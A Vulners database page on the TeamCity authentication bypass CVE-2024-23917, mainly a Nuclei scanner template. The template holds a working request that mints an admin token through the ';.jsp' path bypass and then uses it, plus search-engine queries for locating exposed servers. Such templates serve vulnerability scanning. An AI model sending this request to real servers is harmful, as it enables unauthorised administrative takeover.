| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| CVE-2024-23917 | 6 Feb 202400:00 | – | attackerkb | |
| The vulnerability of the Continuous Integration and Deployment Application Delivery system (CI/CD) of JetBrains TeamCity, related to bypassing the authentication process by using an alternative path or channel, allows a hacker to execute arbitrary code. | 7 Feb 202400:00 | – | bdu_fstec | |
| CVE-2024-23917 | 6 Feb 202411:26 | – | circl | |
| JetBrains Releases Security Advisory for TeamCity On-Premises | 9 Feb 202412:00 | – | cisa | |
| JetBrains TeamCity 安全漏洞 | 6 Feb 202400:00 | – | cnnvd | |
| JetBrains TeamCity Authentication Bypass Vulnerability (CNVD-2025-20493) | 26 Feb 202400:00 | – | cnvd | |
| CVE-2024-23917 | 6 Feb 202409:21 | – | cve | |
| CVE-2024-23917 | 6 Feb 202409:21 | – | cvelist | |
| JetBrains TeamCity Authentication Bypass Flaw, Paving the Way for Server Takeover | 8 Feb 202414:38 | – | hivepro | |
| CVE-2024-23917 | 6 Feb 202410:15 | – | nvd |
id: CVE-2024-23917
info:
name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
impact: |
Unauthenticated attackers can bypass authentication to gain administrative access and potentially execute code on the TeamCity server.
remediation: |
Update JetBrains TeamCity to version 2023.11.3 or later.
reference:
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-23917
cwe-id: CWE-306,CWE-288
epss-score: 0.5373
epss-percentile: 0.98867
cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: jetbrains
product: teamcity
shodan-query:
- "http.title:teamcity"
- http.component:"teamcity"
fofa-query: "title=teamcity"
google-query: "intitle:teamcity"
tags: cve,cve2024,auth-bypass,teamcity,jetbrains,vkev,vuln
flow: http(1) && http(2)
http:
- method: POST
path:
- "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
headers:
Content-Type: "application/x-www-form-urlencoded"
matchers:
- type: dsl
dsl:
- status_code==200
- "contains(content_type,'application/xml')"
- 'contains(body,"<token name=\"{{randstr}}\"")'
condition: and
internal: true
extractors:
- type: regex
part: body
name: authtoken
internal: true
group: 1
regex:
- 'value="(.+)"'
- method: GET
path:
- "{{BaseURL}}/app/rest/server"
headers:
Authorization: "Bearer {{authtoken}}"
extractors:
- type: dsl
dsl:
- '"Token:" + authtoken'
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains(content_type,'application/xml')"
- "contains(body,'<projects href=')"
condition: and
# digest: 4a0a0047304502205ba8b703246b5f4a4763161943e7fcf2d9055d67dca7ad6f05937c425c4f4bf90221008f97d0d561722cbdd054f9d69e5f6575b8f1018b01016d5222e2835eaf208255:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation